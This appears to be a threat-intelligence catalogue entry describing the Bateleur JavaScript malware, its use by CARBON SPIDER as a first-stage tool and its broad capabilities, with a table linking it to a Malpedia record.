Bateleur (81faf0c1-0595-436b-a66a-05d8b435bccd)
Bateleur deployments began not long after JS Flash and were also written in JavaScript. Deployments were more infrequent and testing was not observed. It is likely that Bateleur was run in parallel as an alternative tool and eventually replaced JS Flash as CARBON SPIDER’s first stage tool of choice. Although much simpler in design than JS Flash, all executing out of a single script with more basic obfuscation, Bateleur has a wealth of capabilities—including the ability to download arbitrary scripts and executables, deploy TinyMet, execute commands via PowerShell, deploy a credential stealer, and collect victim system information such as screenshots.
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| Bateleur (81faf0c1-0595-436b-a66a-05d8b435bccd) | Tool | Bateleur (fb75a753-24ba-4b58-b7ed-2e39b0c68c65) | Malpedia | 1 |